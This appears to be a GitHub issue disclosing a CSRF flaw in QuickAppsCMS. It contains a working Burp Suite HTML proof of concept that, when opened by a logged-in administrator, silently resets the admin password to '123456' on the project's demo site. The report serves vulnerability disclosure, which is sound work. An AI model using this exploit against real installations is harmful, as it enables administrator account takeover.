CSRF issue that allows attacker to change the administrator password

There is a CSRF vulnerability has been found in the quickappscms,which can change administrator's password.
After the administrator login in ,open this html page:
POC:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://demo.quickappscms.org/en_US/user/me" method="POST">
      <input type="hidden" name="&#95;method" value="PUT" />
      <input type="hidden" name="name" value="demo" />
      <input type="hidden" name="email" value="info&#64;quickappscms&#46;org" />
      <input type="hidden" name="public&#95;email" value="0" />
      <input type="hidden" name="public&#95;profile" value="0" />
      <input type="hidden" name="web" value="" />
      <input type="hidden" name="locale" value="" />
      <input type="hidden" name="password" value="123456" />
      <input type="hidden" name="password2" value="123456" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

quickapps / cms

CSRF issue that allows attacker to change the administrator password #199